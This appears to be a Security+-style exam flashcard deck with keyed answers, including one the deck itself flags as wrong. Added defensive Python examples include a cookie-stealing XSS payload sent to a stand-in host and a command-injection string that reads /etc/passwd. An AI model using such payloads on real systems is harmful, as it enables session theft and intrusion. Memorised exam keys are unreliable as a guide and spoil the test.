Topic 5 Flashcards Preview


Flashcards in Topic 5 Deck (351)
1

A company wants to ensure confidential data from storage media is sanitized in such a way that the drive
cannot be reused. Which of the following methods should the technician use?

Shredding
Wiping
Low-level formatting
Repartitioning
Overwriting

Shredding

2

An organization's employees currently use three different sets of credentials to access multiple internal
resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?

Transitive trust
Single sign-on
Federation
Secure token

Single sign-on

3

Students at a residence hall are reporting Internet connectivity issues. The university’s network administrator configured the residence hall’s network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall’s network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation?

Router ACLs
BPDU guard
Flood guard
DHCP snooping

DHCP snooping

4

Which of the following is a major difference between XSS attacks and remote code exploits?

XSS attacks use machine language, while remote exploits use interpreted language

XSS attacks target servers, while remote code exploits target clients

Remote code exploits aim to escalate attackers’ privileges, while XSS attacks aim to gain access only

Remote code exploits allow writing code at the client side and executing it, while XSS attacks require
no code to work

XSS attacks use machine language, while remote exploits use interpreted language (keyed answer)

Note: the keyed answer is technically wrong. XSS payloads are interpreted script (JavaScript), and a remote code exploit delivers whatever the target will run, from shell commands to native machine code. The distinction worth remembering is where the attacker's code executes: XSS injects script into a page so that it runs in the victim's browser within the trusted site's origin (stealing session cookies, acting as the user), whereas a remote code exploit executes attacker-supplied code on the target system itself with the privileges of the compromised service. None of the four options states this cleanly.
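The contrast above in code, as an added example that is not part of the original deck: a reflected XSS bug beside its output-encoded fix, and an OS command injection (one common route to remote code execution) beside a hardened wrapper that validates the input and passes an argv list instead of a shell string. The endpoint names, the ping wrapper and the hostname rule are assumptions chosen for illustration.

```python
import html
import re

# Added example, not code from the deck. The function names, the ping wrapper and
# the hostname rule are assumptions chosen to illustrate the two bug classes.

# -- Cross-site scripting: attacker-controlled text becomes part of an HTML page,
#    so the attacker's SCRIPT runs in the VICTIM'S BROWSER within the trusted
#    site's origin (session cookies, DOM, same-origin requests).

def render_greeting_vulnerable(name: str) -> str:
    """Reflected XSS: the request parameter is spliced into HTML unescaped."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_fixed(name: str) -> str:
    """Output-encode for the HTML context so markup in the input is inert text."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


# -- Remote code execution (here via OS command injection): attacker-controlled
#    text becomes a COMMAND that runs on the SERVER with the service's privileges.

def ping_command_vulnerable(host: str) -> str:
    """Builds the shell line a naive wrapper would hand to os.system().

    Returned as a string, not executed, so the example is safe to run."""
    return f"ping -c 1 {host}"


# Strict hostname grammar: dot-separated labels of letters, digits and hyphens.
_HOSTNAME = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_argv_fixed(host: str) -> list:
    """Validate the input, then return an argv list for subprocess.run(argv).

    With a list and no shell=True there is no command interpreter to inject into;
    the validation additionally rejects anything that is not a plain hostname."""
    if len(host) > 253 or not _HOSTNAME.fullmatch(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return ["ping", "-c", "1", host]


def rejects_host(host: str) -> bool:
    """True if the hardened wrapper refuses this input."""
    try:
        ping_argv_fixed(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    xss = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
    print(render_greeting_vulnerable(xss))   # script tag reaches the browser
    print(render_greeting_fixed(xss))        # rendered as literal text
    rce = "127.0.0.1; cat /etc/passwd"
    print(ping_command_vulnerable(rce))      # second command would run on the server
    print(rejects_host(rce), ping_argv_fixed("www.example.com"))
```

The XSS fix is output encoding at the point where untrusted text meets the HTML context; the command-injection fix is input validation plus never handing attacker text to a shell at all. The two bugs share the pattern "data is treated as code", but the code runs on opposite ends of the connection.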

5

An attachment that was emailed to finance employees contained an embedded message. The security
administrator investigates and finds the intent was to conceal the embedded information from public view.
Which of the following BEST describes this type of message?

Obfuscation
Steganography
Diffusion
BCRYPT

Steganography (hiding a message inside another file so that its existence is concealed from view; obfuscation makes content hard to read but does not hide that it is there)

6

Which of the following locations contain the MOST volatile data?

SSD
Paging file
RAM
Cache memory

Cache memory

7

An incident response analyst at a large corporation is reviewing proxy logs. The analyst believes a
malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO).

Which of the following is the best NEXT step for the analyst to take?

Call the CEO directly to ensure awareness of the event
Run a malware scan on the CEO’s workstation
Reimage the CEO’s workstation
Disconnect the CEO’s workstation from the network

Disconnect the CEO's workstation from the network (containment comes first; scanning, reimaging and notification follow once the host can no longer spread or exfiltrate)

8

Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed?

Nonce
Salt
OTP
Block cipher
IV

Salt
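How a salt changes what is stored, as an added example that is not part of the original deck. It uses PBKDF2-HMAC-SHA256 from the Python standard library; the iteration count, salt length and record format are assumptions chosen for illustration. It shows that two users with the same password end up with different stored records, that verification recomputes with the stored salt, and what a salt-less scheme leaks by comparison.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Added example, not from the deck. Scheme and parameters are assumptions:
# PBKDF2-HMAC-SHA256 with a 16-byte random salt and a fixed iteration count.
ITERATIONS = 200_000
SALT_BYTES = 16


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest); draws a fresh random salt when none is supplied."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def encode_record(salt: bytes, digest: bytes) -> str:
    """Storage form: the salt sits in the clear beside the digest (it is not a secret)."""
    return f"pbkdf2-sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _, iterations, salt_hex, digest_hex = record.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def unsalted_digest(password: str) -> str:
    """What a salt-less scheme stores: identical for every user with this password,
    so one precomputed table or one cracked hash covers all of them at once."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def salted_records_differ(password: str) -> bool:
    """Two users with the same password get different stored records."""
    first = encode_record(*hash_password(password))
    second = encode_record(*hash_password(password))
    return first != second


if __name__ == "__main__":
    record = encode_record(*hash_password("hunter2"))
    print(record)
    print(verify_password("hunter2", record), verify_password("hunter3", record))
    print(salted_records_differ("hunter2"), unsalted_digest("hunter2"))
```

The salt does not need to be secret; its job is to make each stored hash unique so an attacker cannot reuse one precomputed table across accounts or spot shared passwords by equal digests. The iteration count (a work factor) is what slows guessing; the salt on its own does not.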

9

A systems administrator found a suspicious file in the root of the file system. The file contains URLs,
usernames, passwords, and text from other documents being edited on the system. Which of the following
types of malware would generate such a file?

Keylogger
Rootkit
Bot
RAT

Keylogger

10

A company utilizes 802.11 for all client connectivity within a facility. Users in one part of the building are
reporting they are unable to access company resources when connected to the company SSID.
Which of the following should the security administrator use to assess connectivity?

Sniffer
Honeypot
Routing tables
Wireless scanner

Wireless scanner (the complaint is localized to one part of the building on an 802.11 network, so the first step is to survey signal strength, channel overlap and rogue or interfering access points in that area; routing tables would not explain a coverage problem)

11

An analyst generates the color-coded table shown in the exhibit to help explain the risk of potential
incidents in the company. The vertical axis indicates the likelihood of an incident, while the horizontal axis
indicates the impact.

Which of the following is this table an example of?

Internal threat assessment
Privacy impact assessment
Qualitative risk assessment
Supply chain assessment

Qualitative risk assessment

12

Legal authorities notify a company that its network has been compromised for the second time in two years.
The investigation shows the attackers were able to use the same vulnerability on different systems in both
attacks. Which of the following would have allowed the security team to use historical information to protect
against the second attack?

Key risk indicators
Lessons learned
Recovery point objectives
Tabletop exercise

Lessons learned

13

An organization identifies a number of hosts making outbound connections to a known malicious IP over port TCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP. Which of the following should the organization do to achieve this outcome?

Use a protocol analyzer to reconstruct the data and implement a web-proxy.
Deploy a web-proxy and then blacklist the IP on the firewall.
Deploy a web-proxy and implement IPS at the network edge.
Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

14

A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor.
Which of the following BEST describes this forensic concept?

Legal hold
Chain of custody
Order of volatility
Data acquisition

Legal hold

15

A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a
requirement for this configuration?

Setting up a TACACS+ server
Configuring federation between authentication servers
Enabling TOTP
Deploying certificates to endpoint devices

Deploying certificates to endpoint devices

16

Which of the following uses tokens between the identity provider and the service provider to authenticate and authorize users to resources?

RADIUS
SSH
OAuth
MSCHAP

OAuth

17

Which of the following is an example of resource exhaustion?

A penetration tester requests every available IP address from a DHCP server.
An SQL injection attack returns confidential data back to the browser.
Server CPU utilization peaks at 100% during the reboot process.
System requirements for a new software package recommend having 12GB of RAM, but only 8GB are available.

A penetration tester requests every available IP address from a DHCP server

18

A company recently updated its website to increase sales. The new website uses PHP forms for leads and
provides a directory with sales staff and their phone numbers. A systems administrator is concerned with the new website and provides the following log to support the concern:

Which of the following is the systems administrator MOST likely to suggest to the Chief Information Security Officer (CISO) based on the above?

Changing the account standard naming convention
Implementing account lockouts
Discontinuing the use of privileged accounts
Increasing the minimum password length from eight to ten characters

Changing the account standard naming convention

19

An organization’s Chief Executive Officer (CEO) directs a newly hired computer technician to install an OS
on the CEO’s personal laptop. The technician performs the installation, and a software audit later in the month indicates a violation of the EULA occurred as a result.

Which of the following would address this violation
going forward?

Security configuration baseline
Separation of duties
AUP
NDA

AUP (acceptable use policy)

20

A security administrator is implementing a secure method that allows developers to place files or objects onto a Linux server. Developers are required to log in using a username, password, and asymmetric key. Which of the following protocols should be implemented?

SSL/TLS
SFTP
SRTP
IPsec

SFTP (file transfer over SSH, which supports password and public-key authentication together)

21

A network technician is designing a network for a small company. The network technician needs to implement
an email server and web server that will be accessed by both internal employees and external customers.
Which of the following would BEST secure the internal network and allow access to the needed servers?

Implementing a site-to-site VPN for server access.
Implementing a DMZ segment for the server.
Implementing NAT addressing for the servers.
Implementing a sandbox to contain the servers.

Implementing a DMZ segment for the server

22

A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any
funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection?

$500
$1000
$2000
$2500

$500 (ALE = SLE x ARO; $500 x 5 = $2,500, which does not exceed the $2,500 annual cost of the control, so the spend is not justified; every larger SLE on the list gives an ALE above the cost)

23

A security auditor is reviewing the following output from file integrity monitoring software installed on a very busy server at a large service provider. The server has not been updated since it was installed. Drag and drop the log entry that identifies the first instance of server compromise.

Page 229

1/1/2017 3:30:00

24

Which of the following control types would a backup of server data provide in case of a system issue?

Corrective
Deterrent
Preventive
Detective

Corrective

25

A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?

Domain hijacking
Injection
Buffer overflow
Privilege escalation

Privilege escalation

26

A security administrator suspects that a DDoS attack is affecting the DNS server. The administrator accesses a
workstation with the hostname of workstation01 on the network and obtains the following output from the
ipconfig command:

The administrator successfully pings the DNS server from the workstation. Which of the following commands
should be issued from the workstation to verify the DDoS attack is no longer occurring?

dig www.google.com
dig 192.168.1.254
dig workstation01.com
dig 192.168.1.26

dig www.google.com (a successful ping only shows the host answers ICMP; asking the configured resolver for a real external name confirms the DNS service itself is responding again)

27

After reports of slow internet connectivity, a technician reviews the following logs from a server’s host-based
firewall:

Which of the following can the technician conclude after reviewing the above logs?

The server is under a DDoS attack from multiple geographic locations.

The server is compromised, and is attacking multiple hosts on the Internet.

The server is under an IP spoofing resource exhaustion attack.

The server is unable to complete the TCP three-way handshake and send the last ACK.

The server is under an IP spoofing resource exhaustion attack (a SYN flood: many half-open connections from sources that never complete the handshake, typically forged addresses)
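The exhibit is not reproduced on the page, so the following is an added example that is not part of the original deck: a small detector run over constructed host-firewall log lines. The log format is an assumption (timestamp, action, protocol, source and destination socket, TCP flags), the thresholds are assumptions, and the TEST-NET documentation ranges stand in for public addresses. It flags a destination port that receives SYNs from many sources of which almost none complete the handshake, and notes when some of those sources are RFC 1918 or other unroutable addresses, which on an Internet-facing interface points to spoofing.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample, not the deck's exhibit. Format is an assumption:
# <timestamp> <action> TCP <src>:<sport> -> <dst>:<dport> flags=<S|SA|A>
# 198.51.100.0/24 and 203.0.113.0/24 play the role of public addresses here.
SAMPLE_LOG = """\
2024-01-10T10:00:01 ACCEPT TCP 198.51.100.7:51234 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:01 ACCEPT TCP 198.51.100.7:51234 -> 192.0.2.5:443 flags=A
2024-01-10T10:00:02 ACCEPT TCP 203.0.113.10:40001 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:02 ACCEPT TCP 10.44.1.9:40002 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:02 ACCEPT TCP 172.16.3.3:40003 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:02 ACCEPT TCP 203.0.113.41:40004 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:03 ACCEPT TCP 203.0.113.77:40005 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:03 ACCEPT TCP 192.168.9.9:40006 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:03 ACCEPT TCP 203.0.113.12:40007 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:03 ACCEPT TCP 203.0.113.13:40008 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:04 ACCEPT TCP 203.0.113.14:40009 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:04 ACCEPT TCP 203.0.113.15:40010 -> 192.0.2.5:443 flags=S
2024-01-10T10:00:05 ACCEPT TCP 198.51.100.20:50001 -> 192.0.2.5:22 flags=S
2024-01-10T10:00:05 ACCEPT TCP 198.51.100.20:50001 -> 192.0.2.5:22 flags=A
"""

LINE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\S+) TCP (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) flags=(?P<flags>\S+)$"
)

# Address blocks that should never be a source on an Internet-facing interface.
UNROUTABLE = [ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",
)]


def parse_lines(log: str):
    """Yield one dict per well-formed log line; unparseable lines are skipped."""
    for raw in log.splitlines():
        m = LINE.match(raw.strip())
        if m:
            yield m.groupdict()


def is_unroutable_source(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in UNROUTABLE)


def analyse(log: str, min_sources: int = 5, max_completion: float = 0.25) -> dict:
    """Per destination socket: SYN sources, how many later sent an ACK, and a verdict.

    Thresholds are assumptions: a flood is called when at least `min_sources`
    distinct sources send SYNs and at most `max_completion` of them complete."""
    syn_sources = defaultdict(set)
    ack_sources = defaultdict(set)
    for e in parse_lines(log):
        key = f"{e['dst']}:{e['dport']}"
        if e["flags"] == "S":
            syn_sources[key].add(e["src"])
        elif e["flags"] == "A" and e["src"] in syn_sources[key]:
            ack_sources[key].add(e["src"])  # third step of the handshake seen
    report = {}
    for key, sources in syn_sources.items():
        completed = len(ack_sources[key])
        unroutable = sum(1 for s in sources if is_unroutable_source(s))
        ratio = completed / len(sources)
        if len(sources) >= min_sources and ratio <= max_completion:
            verdict = "syn-flood"
            if unroutable:
                verdict += " (spoofed sources likely)"
        else:
            verdict = "normal"
        report[key] = {
            "syn_sources": len(sources),
            "completed_handshakes": completed,
            "unroutable_sources": unroutable,
            "verdict": verdict,
        }
    return report


if __name__ == "__main__":
    for socket_, stats in analyse(SAMPLE_LOG).items():
        print(socket_, stats)
```

Half-open connections are the resource being exhausted: each SYN reserves backlog state, and a forged source never answers the SYN-ACK, so the slot stays occupied until it times out. Many distinct sources with a near-zero completion rate is the signature to look for, and unroutable source addresses on an external interface confirm the addresses are forged rather than a real crowd of clients.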

28

A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized.

Which of the following solutions would BEST meet these requirements?

Multifactor authentication
SSO
Biometrics
PKI
Federation

SSO

29

An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?

Faraday cage
Air gap
Mantrap
Bollards

Mantrap

30

A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system
logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the
C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look
suspicious.
One of the files contains the following commands:
Which of the following types of malware was used?

Worm
Spyware
Logic bomb
Backdoor

Backdoor